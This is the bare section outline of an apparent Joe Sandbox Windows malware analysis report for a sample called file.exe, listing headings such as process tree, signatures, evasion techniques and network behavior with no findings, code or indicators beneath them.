
Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
file.exe